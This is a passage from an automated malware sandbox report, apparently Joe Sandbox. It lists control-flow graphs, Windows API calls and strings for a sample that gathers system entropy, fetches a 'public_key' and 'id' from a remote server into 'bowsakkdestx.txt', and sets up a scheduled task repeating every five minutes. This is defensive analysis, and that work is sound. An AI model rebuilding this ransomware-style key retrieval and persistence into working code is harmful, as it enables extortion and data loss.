699->649 700 c11ec4-c11ecb 699->700 700->649 704 c11ed1-c11ed3 700->704 704->649 708 c11ed9-c11eea CreateToolhelp32Snapshot 704->708 708->649 711 c11ef0-c11f01 708->711 713 c11f03-c11f0f GetTickCount 711->713 714 c11f15-c11f22 Heap32ListFirst 711->714 713->714 715 c12081-c12093 714->715 716 c11f28-c11f2d 714->716 718 c12095-c12097 GetTickCount 715->718 719 c1209d-c120b2 Process32First 715->719 717 c11f33-c11f9d call bbf7c0 call bed550 Heap32First 716->717 735 c12015-c12060 Heap32ListNext 717->735 736 c11f9f-c11faa 717->736 718->719 721 c120b4-c120f5 call bbf7c0 call bed550 719->721 722 c1210a-c12116 719->722 721->722 746 c120f7-c120f9 721->746 723 c12120-c12135 722->723 724 c12118-c1211a GetTickCount 722->724 733 c12137 723->733 734 c12196-c121a2 723->734 724->723 740 c12140-c12181 call bbf7c0 call bed550 733->740 737 c121a4-c121a6 GetTickCount 734->737 738 c121ac-c121c1 734->738 735->715 743 c12062-c12064 735->743 741 c11fb0-c11feb call bbf7c0 call bed550 Heap32Next 736->741 737->738 755 c121c3-c12204 call bbf7c0 call bed550 738->755 756 c12219-c12227 738->756 740->734 770 c12183-c12185 740->770 762 c11fed-c11fef 741->762 763 c1200f 741->763 747 c12066-c12077 GetTickCount 743->747 748 c12079-c1207b 743->748 746->721 754 c120fb-c12108 GetTickCount 746->754 747->715 747->748 748->715 748->717 754->721 754->722 755->756 774 c12206-c12208 755->774 759 c12229-c1222b 756->759 760 c1222d CloseHandle 756->760 759->649 760->649 766 c11ff1-c12002 GetTickCount 762->766 767 c12004-c1200d 762->767 763->735 766->763 766->767 767->741 767->763 770->740 772 c12187-c12194 GetTickCount 770->772 772->734 772->740 774->755 775 c1220a-c12217 GetTickCount 774->775 775->755 775->756
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00C11983
                                                                                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00C11994
                                                                                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00C119A1
                                                                                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00C119AE
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00C119E8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00C119FB
                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00C11A2D
                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00C11A81
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11AC5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00C11ADB
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00C11AEE
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00C11B01
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11C15
                                                                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00C11C36
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00C11C50
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00C11C63
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00C11C76
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11D45
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00C11D73
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00C11D86
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00C11D99
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00C11DAC
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00C11DBF
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00C11DD2
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00C11DE5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00C11DF8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00C11E0B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00C11E1E
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00C11E31
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00C11E44
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00C11EDD
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C11F03
                                                                                                                                                                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00C11F1A
                                                                                                                                                                        • Heap32First.KERNEL32(00000024,?,?), ref: 00C11F95
                                                                                                                                                                        • Heap32Next.KERNEL32(?,?,?,?,?,097C0B2E), ref: 00C11FE3
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C11FF1
                                                                                                                                                                        • Heap32ListNext.KERNEL32(?,?), ref: 00C12058
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12066
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12095
                                                                                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 00C120AA
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C120FB
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12118
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12187
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C121A4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                                        • API String ID: 4174345323-1723836103
                                                                                                                                                                        • Opcode ID: 73f91f2035bccf56d3ac26357f52640348176b25a939ec4d72b0b33f05fade8c
                                                                                                                                                                        • Instruction ID: b5b8b5f3c8f7505c541fb7f533bb3e78c22343c57374804b3a774d634d99580a
                                                                                                                                                                        • Opcode Fuzzy Hash: 73f91f2035bccf56d3ac26357f52640348176b25a939ec4d72b0b33f05fade8c
                                                                                                                                                                        • Instruction Fuzzy Hash: FE324EB4E003299BDB219F68CC45BEEB6B9FF45704F0441EAA60CA6151EB748EC0DF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAE690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 776 bae690-bae6d8 call bbf7c0 timeGetTime call bb3f74 call b9c6a0 783 bae6e0-bae6e6 776->783 784 bae6f0-bae722 call bbb420 call b9c500 783->784 789 bae72e-bae772 InternetOpenW 784->789 790 bae724-bae729 784->790 792 bae778-bae77d 789->792 793 bae774-bae776 789->793 791 baea1f-baea40 call bb3cf0 790->791 801 baea8d-baeacc lstrlenA lstrcpyA * 2 lstrlenA 791->801 802 baea42-baea46 791->802 794 bae780-bae789 792->794 796 bae78f-bae7b8 call ba5ae0 call bb1c02 793->796 794->794 797 bae78b-bae78d 794->797 816 bae7be-bae7f7 call ba4690 call b9dd40 796->816 817 bae882-bae8e5 call ba5ae0 call ba3ff0 call ba2900 call ba59d0 796->817 797->796 805 baeace 801->805 806 baeaef-baeb12 801->806 803 baee2a call ba1b10 802->803 804 baea4c-baea61 SHGetFolderPathA 802->804 818 baee2f-baee3a 803->818 804->784 808 baea67-baea88 PathAppendA DeleteFileA 804->808 809 baead0-baead8 805->809 812 baeb18-baeb1f 806->812 813 baeb14-baeb16 806->813 808->784 814 baeada-baeae7 lstrlenA 809->814 815 baeaeb 809->815 820 baeb22-baeb27 812->820 819 baeb2b-baeb4f call ba56d0 call ba2900 813->819 814->809 821 baeae9 814->821 815->806 845 bae7f9-bae7fe 816->845 846 bae86f-bae874 816->846 873 bae8f3-bae917 lstrcpyW 817->873 874 bae8e7-bae8f0 call bb2587 817->874 823 baee3c-baee3f 818->823 824 baee4d-baee82 call b9ef50 818->824 843 baeb53-baeb66 lstrcpyW 819->843 844 baeb51 819->844 820->820 826 baeb29 820->826 821->806 823->783 838 baee86-baee8c 824->838 826->819 840 baee8e-baee90 838->840 841 baee92-baee94 838->841 847 baeea0-baeeaf call ba3ea0 840->847 849 baee97-baee9c 841->849 850 baeb68-baeb71 call bb2587 843->850 851 baeb74-baebe4 lstrlenA call bb0c62 call bbb420 MultiByteToWideChar lstrcpyW call bb3cf0 843->851 844->843 853 bae80c-bae827 845->853 854 bae800-bae809 call bb2587 845->854 846->817 852 bae876-bae87f call bb2587 846->852 847->838 875 baeeb1-baeee3 call b9ef50 847->875 849->849 858 baee9e 849->858 850->851 901 baec3d-baec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 851->901 902 baebe6-baebea 851->902 852->817 855 bae829-bae82d 853->855 856 bae842-bae848 853->856 854->853 864 bae84e-bae86c 855->864 865 bae82f-bae840 call bb05a0 855->865 856->864 858->847 864->846 865->864 879 bae919-bae920 873->879 880 bae943-bae97a InternetOpenUrlW InternetReadFile 873->880 874->873 893 baeee7-baeeed 875->893 879->880 884 bae922-bae92e 879->884 887 bae9ec-baea08 InternetCloseHandle * 2 880->887 888 bae97c-bae994 SHGetFolderPathA 880->888 891 bae930-bae935 884->891 892 bae937 884->892 889 baea0a-baea13 call bb2587 887->889 890 baea16-baea19 887->890 888->887 895 bae996-bae9c2 PathAppendA call bb20b6 888->895 889->890 890->791 898 bae93c-bae93d lstrcatW 891->898 892->898 899 baeeef-baeef1 893->899 900 baeef3-baeef5 893->900 895->887 912 bae9c4-bae9e9 lstrlenA call bb2b02 call bb3a38 895->912 898->880 907 baef01-baef10 call ba3ea0 899->907 908 baeef8-baeefd 900->908 904 baec99 901->904 905 baecbf-baecdd 901->905 902->803 909 baebf0-baec11 SHGetFolderPathA 902->909 913 baeca0-baeca8 904->913 914 baecdf-baece1 905->914 915 baece3-baeced 905->915 907->893 923 baef12-baef4c call ba3ff0 call ba2900 907->923 908->908 916 baeeff 908->916 909->784 911 baec17-baec38 PathAppendA DeleteFileA 909->911 911->783 912->887 919 baecaa-baecb7 lstrlenA 913->919 920 baecbb 913->920 921 baecf9-baed1b call ba56d0 call ba2900 914->921 922 baecf0-baecf5 915->922 916->907 919->913 925 baecb9 919->925 920->905 936 baed1f-baed35 lstrcpyW 921->936 937 baed1d 921->937 922->922 926 baecf7 922->926 941 baef4e 923->941 942 baef50-baef68 lstrcpyW 923->942 925->905 926->921 939 baed43-baedab lstrlenA call bb0c62 call bbb420 MultiByteToWideChar lstrcpyW lstrlenW 936->939 940 baed37-baed40 call bb2587 936->940 937->936 957 baedbc-baedc1 939->957 958 baedad-baedb6 lstrlenW 939->958 940->939 941->942 945 baef6a-baef73 call bb2587 942->945 946 baef76-baefb3 call ba3ff0 call ba2900 942->946 945->946 959 baefb7-baefc6 lstrcpyW 946->959 960 baefb5 946->960 962 baedc3-baede4 SHGetFolderPathA 957->962 963 baee10-baee12 957->963 958->957 961 baee44-baee48 958->961 966 baefc8-baefd1 call bb2587 959->966 967 baefd4-baefe0 959->967 960->959 968 baf01a-baf030 961->968 962->784 969 baedea-baee0b PathAppendA DeleteFileA 962->969 964 baee1d-baee1f 963->964 965 baee14-baee1a call bb0bed 963->965 964->803 971 baee21-baee27 call bb0bed 964->971 965->964 966->967 973 baefee-baf008 967->973 974 baefe2-baefeb call bb2587 967->974 969->783 971->803 979 baf00a-baf013 call bb2587 973->979 980 baf016 973->980 974->973 979->980 980->968
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00C5B3EC,000000FF), ref: 00BAE6C0
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00BAE6D4), ref: 00B9C6C2
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00B9C6F3
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00B9C700
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAE707
                                                                                                                                                                          • Part of subcall function 00B9C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00B9C51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 00BAE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BAE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BAE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00BAE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00BAE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00BAE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00BAE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00BAE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00BAEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00BAEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEC32
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEC3E
                                                                                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00BAEC51
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEC6D
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEC7F
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEC93
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAECB3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAED2A
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAED4B
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAED55
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAED63
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00BAED7D
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAED85
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEDA3
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEDAE
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEDD3
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEDF7
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEE05
                                                                                                                                                                        • _free.LIBCMT ref: 00BAEE15
                                                                                                                                                                        • _free.LIBCMT ref: 00BAEE22
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEF61
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEFBF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 704684250-3586605218
                                                                                                                                                                        • Opcode ID: 2d7a47c10ab0e8309960b2e2e3e24dbdca64b7927677518266846e87b2cb6f61
                                                                                                                                                                        • Instruction ID: 4f9d3703738f9bc7d4aa755254a47c57f43a903b6c438da52fe7ffba9aedf5ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d7a47c10ab0e8309960b2e2e3e24dbdca64b7927677518266846e87b2cb6f61
                                                                                                                                                                        • Instruction Fuzzy Hash: FA42C271508341AFDB20DF24CC89BAF7BE8AF86304F04096DF49597292DB75D649CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1213 b9d240-b9d274 CoInitialize 1214 b9d27d-b9d2dd CoInitializeSecurity call ba4690 CoCreateInstance 1213->1214 1215 b9d276-b9d278 1213->1215 1222 b9da3c-b9da44 CoUninitialize 1214->1222 1223 b9d2e3-b9d3ca VariantInit * 4 VariantClear * 4 1214->1223 1216 b9da8e-b9da92 1215->1216 1218 b9da9f-b9dab1 1216->1218 1219 b9da94-b9da9c call bb2587 1216->1219 1219->1218 1225 b9da69-b9da6d 1222->1225 1230 b9d3cc-b9d3dd CoUninitialize 1223->1230 1231 b9d3e2-b9d3fe call b9b140 1223->1231 1226 b9da7a-b9da8a 1225->1226 1227 b9da6f-b9da77 call bb2587 1225->1227 1226->1216 1227->1226 1230->1225 1236 b9d400-b9d402 1231->1236 1237 b9d404 1231->1237 1238 b9d406-b9d424 call b9b1d0 1236->1238 1237->1238 1242 b9d43c-b9d451 call b9b140 1238->1242 1243 b9d426-b9d437 CoUninitialize 1238->1243 1247 b9d453-b9d455 1242->1247 1248 b9d457 1242->1248 1243->1225 1249 b9d459-b9d494 call b9b1d0 1247->1249 1248->1249 1255 b9d4ac-b9d4c2 1249->1255 1256 b9d496-b9d4a7 CoUninitialize 1249->1256 1259 b9d4c8-b9d4dd call b9b140 1255->1259 1260 b9da2a-b9da37 1255->1260 1256->1225 1264 b9d4df-b9d4e1 1259->1264 1265 b9d4e3 1259->1265 1260->1222 1266 b9d4e5-b9d508 call b9b1d0 1264->1266 1265->1266 1266->1260 1271 b9d50e-b9d524 1266->1271 1271->1260 1273 b9d52a-b9d542 1271->1273 1273->1260 1276 b9d548-b9d55e 1273->1276 1276->1260 1278 b9d564-b9d57c 1276->1278 1278->1260 1281 b9d582-b9d59b 1278->1281 1281->1260 1283 b9d5a1-b9d5b6 call b9b140 1281->1283 1286 b9d5b8-b9d5ba 1283->1286 1287 b9d5bc 1283->1287 1288 b9d5be-b9d5e1 call b9b1d0 1286->1288 1287->1288 1288->1260 1293 b9d5e7-b9d5fd 1288->1293 1293->1260 1295 b9d603-b9d626 1293->1295 1295->1260 1298 b9d62c-b9d651 1295->1298 1298->1260 1301 b9d657-b9d666 1298->1301 1301->1260 1303 b9d66c-b9d681 call b9b140 1301->1303 1306 b9d683-b9d685 1303->1306 1307 b9d687 1303->1307 1308 b9d689-b9d6a3 call b9b1d0 1306->1308 1307->1308 1308->1260 1312 b9d6a9-b9d6be call b9b140 1308->1312 1315 b9d6c0-b9d6c2 1312->1315 1316 b9d6c4 1312->1316 1317 b9d6c6-b9d6e0 call b9b1d0 1315->1317 1316->1317 1317->1260 1321 b9d6e6-b9d6f4 1317->1321 1321->1260 1323 b9d6fa-b9d70f call b9b140 1321->1323 1326 b9d711-b9d713 1323->1326 1327 b9d715 1323->1327 1328 b9d717-b9d731 call b9b1d0 1326->1328 1327->1328 1328->1260 1332 b9d737-b9d74c call b9b140 1328->1332 1335 b9d74e-b9d750 1332->1335 1336 b9d752 1332->1336 1337 b9d754-b9d76e call b9b1d0 1335->1337 1336->1337 1337->1260 1341 b9d774-b9d7ce call bb3aaf call bb3551 call bb28e0 call ba2c40 call ba2900 1337->1341 1352 b9d7d0 1341->1352 1353 b9d7d2-b9d7e3 call b9b140 1341->1353 1352->1353 1356 b9d7e9 1353->1356 1357 b9d7e5-b9d7e7 1353->1357 1358 b9d7eb-b9d819 call b9b1d0 call ba3210 1356->1358 1357->1358 1358->1260 1365 b9d81f-b9d835 1358->1365 1365->1260 1367 b9d83b-b9d85e 1365->1367 1367->1260 1370 b9d864-b9d889 1367->1370 1370->1260 1373 b9d88f-b9d8ab call b9b140 1370->1373 1376 b9d8ad-b9d8af 1373->1376 1377 b9d8b1 1373->1377 1378 b9d8b3-b9d8cd call b9b1d0 1376->1378 1377->1378 1382 b9d8dd-b9d8f2 call b9b140 1378->1382 1383 b9d8cf-b9d8d8 1378->1383 1387 b9d8f8 1382->1387 1388 b9d8f4-b9d8f6 1382->1388 1383->1260 1389 b9d8fa-b9d91d call b9b1d0 1387->1389 1388->1389 1389->1260 1394 b9d923-b9d98d call b9b400 VariantInit * 2 call b9b140 1389->1394 1399 b9d98f-b9d991 1394->1399 1400 b9d993 1394->1400 1401 b9d995-b9da0e call b9b1d0 VariantClear * 3 1399->1401 1400->1401 1405 b9da10-b9da27 call bb052a 1401->1405 1406 b9da46-b9da67 CoUninitialize 1401->1406 1405->1260 1406->1225
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B9D26C
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B9D28F
                                                                                                                                                                        • CoCreateInstance.OLE32(00C6506C,00000000,00000001,00C64FEC,?,?,00000000,000000FF), ref: 00B9D2D5
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D2F0
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D309
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D322
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D33B
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D397
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3A4
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3B1
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3C2
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00B9D3D5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                                                                                        • Opcode ID: c315dfdbe9038feb8bb9cb5b435323a0c554c2ae0d6a2ba6b98589a2a357c50a
